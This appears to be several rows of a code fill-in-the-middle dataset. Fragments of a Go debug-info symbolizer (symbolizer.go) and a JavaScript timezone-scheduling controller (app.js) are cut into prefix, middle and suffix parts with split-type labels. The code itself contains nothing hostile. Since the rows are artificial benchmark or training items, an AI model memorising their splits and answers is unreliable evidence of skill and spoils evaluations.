|
symbolizer.go | : line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes the
// given locations.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
// Check if we already attempted to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) countLocationsToSymbolize(key string, locations []*pb.Location) int {
locationsToSymbolize := 0
for _, loc := range locations {
if _, failedBefore := s.symbolizationFailed[key][loc.Address]; failedBefore {
continue
}
pcRange, found := s.pcRanges[key]
if !found {
locationsToSymbolize++
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsToSymbolize++
}
}
return locationsToSymbolize
}
// newLiner creates a new liner for the given mapping and object file path.
func (s *Symbolizer) newLiner(filepath string, f *elf.File, quality *debuginfopb.DebuginfoQuality) (liner, error) {
switch {
case quality.HasDwarf:
lnr, err := addr2line.DWARF(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create DWARF liner: %w", err)
}
return lnr, nil
case quality.HasGoPclntab:
lnr, err := addr2line.Go(s.logger, filepath, f)
if err != nil {
return nil, fmt.Errorf("failed to create Go liner: %w", err)
}
return lnr, nil
// TODO CHECK plt
case quality.HasSymtab || quality.HasDynsym:
lnr, err := addr2line.Symbols(s.logger, filepath, f, s.demangler)
if err != nil { | random_line_split |
||
symbolizer.go | }
functions := make([]*pb.Function, numFunctions)
numLocations := 0
i := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
numLocations++
for _, line := range locationLines {
functions[i] = line.Function
i++
}
}
}
fres, err := s.metastore.GetOrCreateFunctions(ctx, &pb.GetOrCreateFunctionsRequest{Functions: functions})
if err != nil {
s.errors.WithLabelValues("get_or_create_functions").Inc()
return fmt.Errorf("get or create functions: %w", err)
}
locations = make([]*pb.Location, 0, numLocations)
i = 0
for _, locationsByMapping := range locationsByMappings {
for j, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
lines := make([]*pb.Line, 0, len(locationLines))
for _, line := range locationLines {
lines = append(lines, &pb.Line{
FunctionId: fres.Functions[i].Id,
Line: line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes the
// given locations.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
// Check if we already attempted to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) countLocationsToSymbolize(key string, locations []*pb.Location) int {
locationsToSymbolize := 0
for _, loc := range locations {
if _, failedBefore := s.symbolizationFailed[key][loc.Address]; failedBefore {
continue
}
pcRange, found := s.pcRanges[key]
if !found | {
locationsToSymbolize++
continue
} | conditional_block |
|
symbolizer.go |
func WithDemangleMode(mode string) Option {
return func(s *Symbolizer) {
s.demangler = demangle.NewDemangler(mode, false)
}
}
type Symbolizer struct {
logger log.Logger
// attempts counts the total number of symbolication attempts.
// It counts per batch.
attempts prometheus.Counter
// errors counts the total number of symbolication errors, partitioned by an error reason
// such as failure to fetch unsymbolized locations.
// It counts per batch.
errors *prometheus.CounterVec
// duration is a histogram to measure how long it takes to finish a symbolication round.
// Note, a single observation is per batch.
duration prometheus.Histogram
// storeDuration is a histogram to measure how long it takes to store the symbolized locations.
// Note, a single observation is per batch.
storeDuration prometheus.Histogram
metastore pb.MetastoreServiceClient
debuginfo DebuginfoFetcher
metadata DebuginfoMetadata
demangler *demangle.Demangler
attemptThreshold int
linerCreationFailed map[string]struct{}
symbolizationAttempts map[string]map[uint64]int
symbolizationFailed map[string]map[uint64]struct{}
pcRanges map[string][2]uint64
linerCache map[string]liner
batchSize uint32
tmpDir string
}
type DebuginfoFetcher interface {
// FetchDebuginfo ensures that the debug info for the given build ID is
// available and returns a reader for its contents.
FetchDebuginfo(ctx context.Context, dbginfo *debuginfopb.Debuginfo) (io.ReadCloser, error)
}
func New(
logger log.Logger,
reg prometheus.Registerer,
metadata DebuginfoMetadata,
metastore pb.MetastoreServiceClient,
debuginfo DebuginfoFetcher,
tmpDir string,
batchSize uint32,
opts ...Option,
) *Symbolizer {
attemptsTotal := promauto.With(reg).NewCounter(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_attempts_total",
Help: "Total number of symbolication attempts in batches.",
},
)
errorsTotal := promauto.With(reg).NewCounterVec(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_errors_total",
Help: "Total number of symbolication errors in batches, partitioned by an error reason.",
},
[]string{"reason"},
)
duration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_symbolication_duration_seconds",
Help: "How long it took in seconds to finish a round of the symbolication cycle in batches.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
storeDuration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_store_duration_seconds",
Help: "How long it took in seconds to store a batch of the symbolized locations.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
const (
defaultDemangleMode = "simple"
defaultAttemptThreshold = 3
)
s := &Symbolizer{
logger: log.With(logger, "component", "symbolizer"),
attempts: attemptsTotal,
errors: errorsTotal,
duration: duration,
storeDuration: storeDuration,
metastore: metastore,
debuginfo: debuginfo,
tmpDir: tmpDir,
batchSize: batchSize,
metadata: metadata,
demangler: demangle.NewDemangler(defaultDemangleMode, false),
attemptThreshold: defaultAttemptThreshold,
linerCreationFailed: map[string]struct{}{},
symbolizationAttempts: map[string]map[uint64]int{},
symbolizationFailed: map[string]map[uint64]struct{}{},
pcRanges: map[string][2]uint64{},
}
for _, opt := range opts {
opt(s)
}
return s
}
func (s *Symbolizer) Run(ctx context.Context, interval time.Duration) error {
return runutil.Repeat(interval, ctx.Done(), func() error {
level.Debug(s.logger).Log("msg", "start symbolization cycle")
s.runSymbolizationCycle(ctx)
level.Debug(s.logger).Log("msg", "symbolization loop completed")
return nil
})
}
func (s *Symbolizer) runSymbolizationCycle(ctx context.Context) {
var begin time.Time
prevMaxKey := ""
for {
begin = time.Now()
s.attempts.Inc()
lres, err := s.metastore.UnsymbolizedLocations(ctx, &pb.UnsymbolizedLocationsRequest{
Limit: s.batchSize,
MinKey: prevMaxKey,
})
if err != nil {
level.Error(s.logger).Log("msg", "failed to fetch unsymbolized locations", "err", err)
s.errors.WithLabelValues("fetch_unsymbolized_locations").Inc()
s.duration.Observe(time.Since(begin).Seconds())
// Try again on the next cycle.
return
}
if len(lres.Locations) == 0 {
s.duration.Observe(time.Since(begin).Seconds())
// Nothing to symbolize.
return
}
prevMaxKey = lres.MaxKey
err = s.Symbolize(ctx, lres.Locations)
if err != nil {
level.Debug(s.logger).Log("msg", "errors occurred during symbolization", "err", err)
}
s.duration.Observe(time.Since(begin).Seconds())
if s.batchSize == 0 {
// If batch size is 0 we won't continue with the next batch as we
// should have already processed everything.
return
}
}
}
// UnsymbolizableMapping returns true if a mapping points to a binary for which
// locations can't be symbolized in principle, at least now. Examples are
// "[vdso]", [vsyscall]" and some others, see the code.
func UnsymbolizableMapping(m *pb.Mapping) bool {
name := filepath.Base(m.File)
return strings.HasPrefix(name, "[") || strings.HasPrefix(name, "linux-vdso") || strings.HasPrefix(m.File, "/dev/dri/")
}
type MappingLocations struct {
Mapping *pb.Mapping
Locations []*pb.Location
// LocationsLines is a list of lines per location.
LocationsLines [][]profile.LocationLine
}
func (s *Symbolizer) Symbolize(ctx context.Context, locations []*pb.Location) error {
mappingsIndex := map[string]int{}
mappingIDs := []string{}
for _, loc := range locations {
if _, ok := mappingsIndex[loc.MappingId]; !ok {
mappingIDs = append(mappingIDs, loc.MappingId)
mappingsIndex[loc.MappingId] = len(mappingIDs) - 1
}
}
mres, err := s.metastore.Mappings(ctx, &pb.MappingsRequest{MappingIds: mappingIDs})
if err != nil {
s.errors.WithLabelValues("get_mappings").Inc()
return fmt.Errorf("get mappings: %w", err)
}
// Aggregate locations per mapping to get prepared for batch request.
locationsByMappings := make([]*MappingLocations, len(mres.Mappings))
for i, m := range mres.Mappings {
locationsByMappings[i] = &MappingLocations{Mapping: m}
}
for _, loc := range locations {
locationsByMapping := locationsByMappings[mappingsIndex[loc.MappingId]]
// Already symbolized!
if loc.Lines != nil && len(loc.Lines) > 0 {
level.Debug(s.logger).Log("msg", "location already symbolized, skipping")
continue
}
locationsByMapping.Locations = append(locationsByMapping.Locations, loc)
}
newLinerCache := map[string]liner{}
for _, locationsByMapping := range locationsByMappings {
mapping := locationsByMapping.Mapping
// If Mapping or Mapping.BuildID is empty, we cannot associate an object file with functions.
if mapping == nil || len(mapping.BuildId) == 0 || UnsymbolizableMapping(mapping) {
level.Debug(s.logger).Log("msg", "mapping of location is empty, skipping")
continue
}
logger := log.With(s.logger, "buildid", mapping.BuildId)
var liner liner
locations := locationsByMapping.Locations
// Symbolize returns a list of lines per location passed to it.
locationsByMapping.LocationsLines, liner, err = s.symbolizeLocationsForMapping(ctx, mapping, locations)
if err != nil {
level.Debug(logger).Log("msg", "storage symbol | {
return func(s *Symbolizer) {
s.attemptThreshold = t
}
} | identifier_body |
|
app.js | SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel; | }
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
if (params.tz != $location.search.tz ||
params.date != $location.search.date ||
params.range != $location.search.range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i = 0; i < zones.length; i++) {
var zoneName = zones[i];
if (zoneName[zoneName.length - 1] == '!') {
zoneName = zoneName.substr(0, zoneName.length - 1);
homeZone = zoneName;
}
allZones.push(zoneName);
}
if (params.date) {
var newDate = moment(params.date, 'YYYY-MM-DD');
if (!moment(newDate).isSame(moment($scope.day))) {
$scope.day = newDate.toDate();
dateChanged = true;
}
}
if (params.range) {
var rangePieces = params.range.split(',');
$scope.timeRange = [parseInt(rangePieces[0], 10),
parseInt(rangePieces[1], 10)];
$scope.scheduleMeeting = true;
} else {
$scope.scheduleMeeting = false;
}
if (dateChanged || $scope.z | random_line_split |
|
app.js |
function zoneExists(input) {
return !!SELECTABLES_BY_NAME[normalizeZoneName(input)];
}
function lookupTimeZoneState(input) {
var zone = SELECTABLES_BY_NAME[normalizeZoneName(input)];
if (!zone) {
zone = SELECTABLES_BY_KEY[input];
if (!zone)
return null;
}
var m;
try {
m = moment.tz(normalizeZoneName(zone.z));
} catch (e) {
}
return m !== null ? new TimeZoneState(m, zone) : null;
}
timesched.setTimezoneData = function(data) {
SELECTABLES = [];
SELECTABLES_BY_NAME = {};
SELECTABLES_BY_KEY = {};
for (var i = 0; i < data.selectables.length; i++) {
var sel = data.selectables[i];
SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel;
}
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
